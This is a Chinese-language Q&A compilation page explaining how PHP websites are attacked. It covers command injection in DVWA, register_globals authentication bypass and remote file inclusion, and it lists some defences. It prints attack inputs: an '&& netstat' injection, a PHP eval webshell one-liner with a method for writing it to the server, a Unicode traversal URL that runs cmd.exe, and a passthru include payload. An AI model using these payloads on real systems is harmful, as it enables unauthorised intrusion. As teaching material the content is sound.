導航:首頁 > 編程語言 > 如何攻擊php網站

如何攻擊php網站

發布時間:2023-08-26 16:38:56

⑴ thinkphp 網站怎麼攻擊

這種開源產品一般很難找到漏洞。即使找到了,一旦有人受到攻擊,補丁馬上就會出來

⑵ 常見WEB攻擊之命令注入

即 Command Injection。是指通過提交惡意構造的參數破壞命令語句結構,從而達到執行惡意命令的目的。

在Web應用中,有時候會用到一些命令執行的函數,如php中system、exec、shell_exec等,當對用戶輸入的命令沒有進行限制或者過濾不嚴導致用戶可以執行任意命令時,就會造成命令執行漏洞。

黑客將構造好的命令發送給web伺服器,伺服器根據拼接命令執行注入的命令,最後講結果顯示給黑客。

以DVWA為例,下面使用ping命令測試IP,正常輸入一個IP或者域名會返回一個正常的返回結果。
當輸入惡意構造的語句 www..com && netstat -an,會把後面的語句也給執行了:

執行結果:

PHP的常見命令執行函數:
system(),exec(),shell_exec(),passthru()

1、system()

system — 執行外部程序,並且顯示輸出

常規用法:

使用PHP執行:
php test1.php www..com

exec — 執行一個外部程序

3、shell_exec()

shell_exec — 通過 shell 環境執行命令,並且將完整的輸出以字元串的方式返回。

4、passthru()

passthru() 函數與 exec() 函數類似,執行外部程序並且顯示原始輸出。

Windows:

用^轉義<

如果加上單引號會寫不進去,如果加雙引號會把雙引號一起寫進去,所以要用^轉義<

linux

linux下需要用來轉義<,不過很多php都默認開啟gpc,可以先用16進制轉換一句話再用xxd命令把16進制還原.

<?php eval($_POST[pass]);>
轉換為16進制:


由於我用的是Linux,所以使用payload寫入一句話:

寫入成功:

1、採用白名單,或使用正則表達式進行過濾。

2、不要讓用戶可以直接控制eval()、system、exec、shell_exec等函數的參數。

3、在進入執行命令函數和方法前,對變數進行過濾,對敏感字元進行轉義。

⑶ 如何對php中常見漏洞進行攻擊與防護翻譯

[全局變數]
PHP中的變數不需要事先聲明,它們會在第一次使用時自動創建,它們的類型也不需要指定,它們會根據上下文環境自動確定。從程序員的角度來看,這無疑是一種極其方便的處理方法。很顯然,這也是快速開發語言的一個很有用的特點。一旦一個變數被創建了,就可以在程序中的任何地方使用。這個特點導致的結果就是程序員很少初始化變數,畢竟,當它們第一次創建時,他們是空的。

很顯然,基於PHP的應用程序的主函數一般都是接受用戶的輸入(主要是表單變數,上載文件和Cookie等),然後對輸入數據進行處理,然後把結果返回到客戶端瀏覽器。為了使PHP代碼訪問用戶的輸入盡可能容易,實際上PHP是把這些輸入數據看作全局變數來處理的。

例如:

<FORM METHOD="GET" ACTION="test.php">
<INPUT TYPE="TEXT" NAME="hello">
<INPUT TYPE="SUBMIT">
</FORM>

很顯然,這會顯示一個文本框和提交按鈕。當用戶點擊提交按鈕時,「test.php」會處理用戶的輸入,當「test.php」運行時,「$hello」會包含用戶在文本框輸入的數據。從這里我們應該看出,攻擊者可以按照自己的意願創建任意的全局變數。如果攻擊者不是通過表單輸入來調用「test.php」,而是直接在瀏覽器地址欄輸入http://server/test.php?hello=hi&setup=no,那麼,不止是「$hello」被創建,「$setup」也被創建了。

譯者註:這兩種方法也就是我們通常說的「POST」和「GET」方法。
下面的用戶認證代碼暴露了PHP的全局變數所導致的安全問題:

<?php
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>

上面的代碼首先檢查用戶的密碼是否為「hello」,如果匹配的話,設置「$auth」為「1」,即通過認證。之後如果「$suth」為「1」的話,就會顯示一些重要信息。

表面看起來是正確的,而且我們中有相當一部分人是這樣做的,但是這段代碼犯了想當然的錯誤,它假定「$auth」在沒有設置值的時候是空的,卻沒有想到攻擊者可以創建任何全局變數並賦值,通過類似「http://server/test.php?auth=1」的方法,我們完全可以欺騙這段代碼,使它相信我們是已經認證過的。

因此,為了提高PHP程序的安全性,我們不能相信任何沒有明確定義的變數。如果程序中的變數很多的話,這可是一項非常艱巨的任務。

一種常用的保護方式就是檢查數組HTTP_GET[]或POST_VARS[]中的變數,這依賴於我們的提交方式(GET或POST)。當PHP配置為打開「track_vars」選項的話(這是預設值),用戶提交的變數就可以在全局變數和上面提到的數組中獲得。

但是值得說明的是,PHP有四個不同的數組變數用來處理用戶的輸入。HTTP_GET_VARS數組用來處理GET方式提交的變數,HTTP_POST_VARS數組用於處理POST方式提交的變數,HTTP_COOKIE_VARS數組用於處理作為cookie頭提交的變數,而對於HTTP_POST_FILES數組(比較新的PHP才提供),則完全是用戶用來提交變數的一種可選方式。用戶的一個請求可以很容易的把變數存在這四個數組中,因此一個安全的PHP程序應該檢查這四個數組。

[遠程文件]
PHP是一種具有豐富特性的語言,提供了大量的函數,使編程者實現某個功能很容易。但是從安全的角度來看,功能越多,要保證它的安全性就越難,遠程文件就是說明這個問題的一個很好的例子:

<?php
if (!($fd = fopen("$filename", "r"))
echo("Could not open file: $filename<BR>\n");
?>

上面的腳本試圖打開文件「$filename」,如果失敗就顯示錯誤信息。很明顯,如果我們能夠指定「$filename」的話,就能利用這個腳本瀏覽系統中的任何文件。但是,這個腳本還存在一個不太明顯的特性,那就是它可以從任何其它WEB或FTP站點讀取文件。實際上,PHP的大多數文件處理函數對遠程文件的處理是透明的。

例如:
如果指定「$filename」為「http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir」
則上面的代碼實際上是利用主機target上的unicode漏洞,執行了dir命令。

這使得支持遠程文件的include(),require(),include_once()和require_once()在上下文環境中變得更有趣。這些函數主要功能是包含指定文件的內容,並且把它們按照PHP代碼解釋,主要是用在庫文件上。

例如:
<?php
include($libdir . "/languages.php");
?>

上例中「$libdir」一般是一個在執行代碼前已經設置好的路徑,如果攻擊者能夠使得「$libdir」沒有被設置的話,那麼他就可以改變這個路徑。但是攻擊者並不能做任何事情,因為他們只能在他們指定的路徑中訪問文件languages.php(perl中的「Poison null byte」攻擊對PHP沒有作用)。但是由於有了對遠程文件的支持,攻擊者就可以做任何事情。例如,攻擊者可以在某台伺服器上放一個文件languages.php,包含如下內容:

<?php
passthru("/bin/ls /etc");
?>

閱讀全文

與如何攻擊php網站相關的資料

熱點內容
普信app為什麼用不了 瀏覽:252
linux查找rpm包 瀏覽:114
怎麼把安卓手機繁體字改為現代字 瀏覽:896
pdf簽名如何刪除 瀏覽:410
按摩解壓腿部足部 瀏覽:293
app切圖用什麼軟體 瀏覽:5
訂購命令英語 瀏覽:661
java正則網址 瀏覽:779
程序員上班可不可以自學 瀏覽:428
空調壓縮機排空氣視頻 瀏覽:285
centos72nginxphp 瀏覽:186
游戲平台用什麼伺服器好 瀏覽:754
保密櫃里的圖片是加密文件嗎 瀏覽:911
php判斷最後一個字元 瀏覽:637
pdf腦區 瀏覽:635
at命令已棄用 瀏覽:492
買點賣出指標源碼 瀏覽:614
36位單片機 瀏覽:431
英雄聯盟山東伺服器地址 瀏覽:214
sd伺服器什麼意思 瀏覽:621